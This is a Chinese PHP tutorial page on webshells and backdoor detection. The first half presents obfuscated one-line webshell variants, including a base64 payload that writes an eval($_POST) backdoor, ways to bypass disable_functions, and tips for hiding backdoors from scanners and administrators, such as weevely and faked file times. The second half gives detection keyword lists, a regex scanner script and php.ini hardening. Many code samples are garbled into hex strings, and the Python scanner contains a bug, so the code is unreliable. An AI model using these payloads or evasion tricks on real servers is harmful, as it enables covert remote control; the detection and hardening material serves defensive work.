详解PHP安全之webshell和后门检测示例-php教程-PHP中文网

首页

后端开发

php教程

详解PHP安全之webshell和后门检测示例

高洛峰

Mar 19, 2017 pm 01:18 PM

基于PHP的应用面临着各种各样的攻击：

XSS：对PHP的Web应用而言，跨站脚本是一个易受攻击的点。攻击者可以利用它盗取用户信息。你可以配置Apache，或是写更安全的PHP代码（验证所有用户输入）来防范XSS攻击
SQL注入：这是PHP应用中，数据库层的易受攻击点。防范方式同上。常用的方法是，使用mysql_real_escape_string()对参数进行转义，而后进行SQL查询。
文件上传：它可以让访问者在服务器上放置（即上传）文件。这会造成例如，删除服务器文件、数据库，获取用户信息等一系列问题。你可以使用PHP来禁止文件上传，或编写更安全的代码（如检验用户输入，只允许上传png、gif这些图片格式）
包含本地与远程文件：攻击者可以使远程服务器打开文件，运行任何PHP代码，然后上传或删除文件，安装后门。可以通过取消远程文件执行的设置来防范
eval/assert：这个函数可以使一段字符串如同PHP代码一样执行。它通常被攻击者用于在服务器上隐藏代码和工具。通过配置PHP，取消eval等函数调用来实现
Sea-surt Attack（Cross-site request forgery，CSRF。跨站请求伪造）：这种攻击会使终端用户在当前账号下执行非指定行为。这会危害终端用户的数据与操作安全。如果目标终端用户的账号用于管理员权限，整个Web应用都会收到威胁。

这里介绍上述加粗的几种攻击的方法

一、各种webshell

随着业务量的增大，越来越多的黑客来攻击扫描，网站安全性日益重要，一不留神就被黑客控制了服务器，最常见的方式就是通过POST请求来上传木马文件，从而达到可以执行任意命令，如果被控制就大事不妙了

所以还是要正视服务器的安全

最流行的一种后门叫做一句话木马，其形式如下所示：

816902e813774a5d3e274ff002b2d9d1$cmde03b848252eb9375d56be284e690e873";
    die;
}
?>

这种容易被安全软件检测出来。为了增强隐蔽性，出现了各种一句话木马的变形，通过各种函数来伪装，这里不得不吐槽PHP弱类型对于安全来说是致命的

a、使用str_replace函数

f719fa3e7c702d0c9504bf591feaaaa7
//说明：请求参数  ?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))
最终执行命令89a035d12aeeb84db9af645e58c29b38")）?>

b、使用str_rot13函数

4535b94974c19a37ea1c3c1e76db8993
//说明：首先，将eval函数用str_rot13('riny')隐藏。然后，利用 e 修饰符，在preg_replace完成字符串替换后，使得引擎将结果字符串作为php代码使用eval方式进行评估并将返回值作为最终参与替换的字符串。

c、使用include函数

c9d8f4e91471e80dd9c3d17d5e41d056
//由于include方法可以直接编译任何格式的文件为php格式运行，因此可以上传一个txt格式的php文件，将真正的后门写在文本当中。

d、使用pack函数

1c9d9e58511ac19adcb18ef0a340a0ad

e、使用session

df34af08e07ef1d03d6a0918f39d31a3
100db36a723c770d327fc0aef2ce13b193f0f5c25f18dab9d176bd4f6de5d30e
b2386ffb911b14667cb8f0f91ea547a7404 Not Found6e916e0f7d1e588d4f442bf645aedb2f
9c3bca370b5104690d9ef395f2c5f8d16c04bd5ca3fcae76e30b72ad730ca86d
4a249f0d628e2318394fd9b75b4636b1Not Found473f0a7621bec819994bb5020d29372a
e388a4556c0f65e1904146cc1a846beeThe requested URL was not found on this server.94b3e26ee717c64999d7867364b1b4a3
36cc49f0c466276486e50c850b7e495673a6ac4ed44ffec12cee46588e518a5e
abdc18a0f3f54d92179eb38bdd996eb5

g、使用assert函数

c6eec2c5042d3f7a6f389c662e2f2876

或者

979af987789a6294e7e6f221f3f7f196

或者

82a6af2d894c511e2dadce075707684e

可以使用weevely工具来生成，代码伪装避开各种主流的杀毒软件

PHP后门生成工具weevely

weevely是一款针对PHP的webshell的自由软件，可用于模拟一个类似于telnet的连接shell，weevely通常用于web程序的漏洞利用，隐藏后门或者使用类似telnet的方式来代替web 页面式的管理，weevely生成的服务器端php代码是经过了base64编码的，所以可以骗过主流的杀毒软件和IDS，上传服务器端代码后通常可以通过weevely直接运行。

weevely所生成的PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术，后门中所使用的函数均是常用的字符串处理函数，被作为检查规则的eval，system等函数都不会直接出现在代码中，从而可以致使后门文件绕过后门查找工具的检查。使用暗组的Web后门查杀工具进行扫描，结果显示该文件无任何威胁。

更常用的混淆视听的方法:（这种是服务器层面的混淆）

修改文件时间
改名融入上传后所在文件夹，让人无法直观看出文件异常
文件大小的伪装处理(至少看起大小像个正常脚本)
选好藏身路径并尽量少的访问
畸形目录%20

三、如果绕过配置文件

一般的服务器管理员会把 system、exec等危险函数禁用的，那么如何绕过呢？

1、使用反射

03e7430702a3d5ac1fb0384b341e6fc5invokeArgs(array("$_GET[c]"));
?>

2、使用callback

php提供的另外一种可间接调用函数的方法是callback. 这里使用了ob_start.

76eec27e2b07dfd68ebc905d3066a9b1

php中支持callback的函数还有很多，比如 array_map,array_filter, array_reduce,usort(),uksort(),array_walk() 等

四、安全人员应该怎么做

1、如何查找

直观寻找方式也有很多

通过文件名/修改时间/大小，文件备份比对发现异常（SVN/Git对比，查看文件是否被修改）
通过WEBSHELL后门扫描脚本发现，如Scanbackdoor.php/Pecker/shelldetect.php/（zhujiweishi ）
通过access.log访问日志分析

下面是360 zhujiweishi ，在linux服务器上非常简单好用

PHP安全之webshell和后门检测

通过常见的关键词如（可以使用find 和 grep 等命令结合起来搜索代码中是否包含以下文件）

系统命令执行: system, passthru, shell_exec, exec, popen, proc_open
代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

通过简单的python脚本

#!/usr/bin/env python
# encoding: utf-8
 
import os,sys
import re
import hashlib
import time
 
rulelist = [
    &#39;(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))&#39;,
    &#39;((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))&#39;,
    &#39;(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})&#39;,
    &#39;(function\_exists\s*\(\s*[\&#39;|\"](popen|exec|proc\_open|passthru)+[\&#39;|\"]\s*\))&#39;,
    &#39;((exec|shell\_exec|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\))&#39;,
    &#39;(\$(\w+)\s*\(\s.chr\(\d+\)\))&#39;,
    &#39;(\$(\w+)\s*\$\{(.*)\})&#39;,
    &#39;(\$(\w+)\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\s*\))&#39;,
    &#39;(\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\]\(\s*\$(.*)\))&#39;,
    &#39;(\$\_\=(.*)\$\_)&#39;,
    &#39;(\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\))&#39;,
    &#39;(new com\s*\(\s*[\&#39;|\"]shell(.*)[\&#39;|\"]\s*\))&#39;,
    &#39;(echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\))&#39;,
    &#39;((fopen|fwrite|fputs|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|REQUEST|COOKIE|SERVER)+\[(.*)\](.*)\))&#39;,
    &#39;(\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\))&#39;,
    &#39;(\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\))&#39;,
    &#39;((include|require|include\_once|require\_once)+\s*\(\s*[\&#39;|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\&#39;|\"]\s*\))&#39;,
    &#39;(eval\s*\(\s*\(\s*\$\$(\w+))&#39;,
    &#39;((eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\))&#39;,
    &#39;(preg\_replace\s*\((.*)\(base64\_decode\(\$)&#39;
    ]
 
def scan(path):
    print(&#39;           可疑文件         &#39;)
    print(&#39;*&#39;*30)
    for root,dirs,files in os.walk(path):
        for filespath in files:
            if os.path.getsize(os.path.join(root,filespath))<1024000:
                file= open(os.path.join(root,filespath))
                filestr = file.read()
                file.close()
                for rule in rulelist:
                    result = re.compile(rule).findall(filestr)
                    if result:
                        print &#39;文件:&#39;+os.path.join(root,filespath )
                        print &#39;恶意代码:&#39;+str(result[0][0:200])
                        print (&#39;最后修改时间:&#39;+time.strftime(&#39;%Y-%m-%d %H:%M:%S&#39;,time.localtime(os.path.getmtime(os.path.join(root,filespath)))))
                        print &#39;\n\n&#39;
                        break
def md5sum(md5_file):
    m = hashlib.md5()
    fp = open(md5_file)
    m.update(fp.read())
    return m.hexdigest()
    fp.close()
 
if md5sum(&#39;/etc/issue&#39;) == &#39;3e3c7c4194b12af573ab11c16990c477&#39;:
    if md5sum(&#39;/usr/sbin/sshd&#39;) == &#39;abf7a90c36705ef679298a44af80b10b&#39;:
        pass
    else:
        print(&#39;*&#39;*40)
        print "\033[31m sshd被修改，疑似留有后门\033[m"
        print(&#39;*&#39;*40)
        time.sleep(5)
if md5sum(&#39;/etc/issue&#39;) == &#39;6c9222ee501323045d85545853ebea55&#39;:
    if md5sum(&#39;/usr/sbin/sshd&#39;) == &#39;4bbf2b12d6b7f234fa01b23dc9822838&#39;:
        pass
    else:
        print(&#39;*&#39;*40)
        print "\033[31m sshd被修改，疑似留有后门\033[m"
        print(&#39;*&#39;*40)
        time.sleep(5)
if name==&#39;main&#39;:
 
    if len(sys.argv)!=2:
        print &#39;参数错误&#39;
        print "\t按恶意代码查找:"+sys.argv[0]+&#39;目录名&#39;
    if os.path.lexists(sys.argv[1]) == False:
        print "目录不存在"
        exit()
    print (&#39;\n\n开始查找:&#39;+sys.argv[1])
    if len(sys.argv) ==2:
        scan(sys.argv[1])
    else:
        exit()

2、如何防范

php.ini 设置

disable_functions =phpinfo,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,get_current_user,leak,putenv,popen,opendir
设置“safe_mode”为“on”
禁止“open_basedir” 可以禁止指定目录之外的文件操作
expose_php设为off 这样php不会在http文件头中泄露信息
设置“allow_url_fopen”为“off” 可禁止远程文件功能
log_errors”设为“on” 错误日志开启

php编码方面

所有用户提交的信息 post get 或是其他形式提交的数据都要单独写个过滤函数处理一遍，养成习惯(intval，strip_tags，mysql_real_escape_string)
经常检查有没有一句话木马 eval($_POST[ 全站搜索php代码有没有这样的源代码
文件要命名规范至少让自己可以一目了然，哪些php文件名字有问题
如用开源代码，有补丁出来的话，尽快打上补丁
如果攻击者拿到了服务器的最高权限，有可能通过修改服务器的配置文件php.ini来达到他们隐藏后门的目的，前几年比较流行。原理如下：php.ini 里面的这两个配置项：auto_prepend_file ，auto_append_file 可以让php解析前，自己加点东西进去 Automatically add files before or after any PHP document,如果被配置了eval()函数的后门那就很阴险了，php文件代码里面查不出，只会在php解析前包含eval()函数进来并且因为是全局的所以所有php页面都是后门！所以要先确认auto_prepend_file ，auto_append_file没被配置成其他东西，才进行第3点的源代码检查。

服务器配置

配置的时候尽量使用最小权限，不要写入或者执行的目录不能给相应的权限

nginx或者apache配置的时候，不能访问的目录一定要配置为deny

以上是详解PHP安全之webshell和后门检测示例的详细内容。更多信息请关注PHP中文网其他相关文章！

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

如何检查PHP会话是否已经开始？Apr 30, 2025 am 12:20 AM

在PHP中，可以使用session_status()或session_id()来检查会话是否已启动。1)使用session_status()函数，如果返回PHP_SESSION_ACTIVE，则会话已启动。2)使用session_id()函数，如果返回非空字符串，则会话已启动。这两种方法都能有效地检查会话状态，选择使用哪种方法取决于PHP版本和个人偏好。

描述一个场景，其中使用会话在Web应用程序中至关重要。Apr 30, 2025 am 12:16 AM

sessionsarevitalinwebapplications，尤其是在commercePlatform之前。

如何管理PHP中的并发会话访问？Apr 30, 2025 am 12:11 AM

在PHP中管理并发会话访问可以通过以下方法：1.使用数据库存储会话数据，2.采用Redis或Memcached，3.实施会话锁定策略。这些方法有助于确保数据一致性和提高并发性能。

使用PHP会话的局限性是什么？Apr 30, 2025 am 12:04 AM

PHPsessionshaveseverallimitations:1)Storageconstraintscanleadtoperformanceissues;2)Securityvulnerabilitieslikesessionfixationattacksexist;3)Scalabilityischallengingduetoserver-specificstorage;4)Sessionexpirationmanagementcanbeproblematic;5)Datapersis

解释负载平衡如何影响会话管理以及如何解决。Apr 29, 2025 am 12:42 AM

负载均衡会影响会话管理，但可以通过会话复制、会话粘性和集中式会话存储解决。1.会话复制在服务器间复制会话数据。2.会话粘性将用户请求定向到同一服务器。3.集中式会话存储使用独立服务器如Redis存储会话数据，确保数据共享。

说明会话锁定的概念。Apr 29, 2025 am 12:39 AM

Sessionlockingisatechniqueusedtoensureauser'ssessionremainsexclusivetooneuseratatime.Itiscrucialforpreventingdatacorruptionandsecuritybreachesinmulti-userapplications.Sessionlockingisimplementedusingserver-sidelockingmechanisms,suchasReentrantLockinJ

有其他PHP会议的选择吗？Apr 29, 2025 am 12:36 AM

PHP会话的替代方案包括Cookies、Token-basedAuthentication、Database-basedSessions和Redis/Memcached。1.Cookies通过在客户端存储数据来管理会话，简单但安全性低。2.Token-basedAuthentication使用令牌验证用户，安全性高但需额外逻辑。3.Database-basedSessions将数据存储在数据库中，扩展性好但可能影响性能。4.Redis/Memcached使用分布式缓存提高性能和扩展性，但需额外配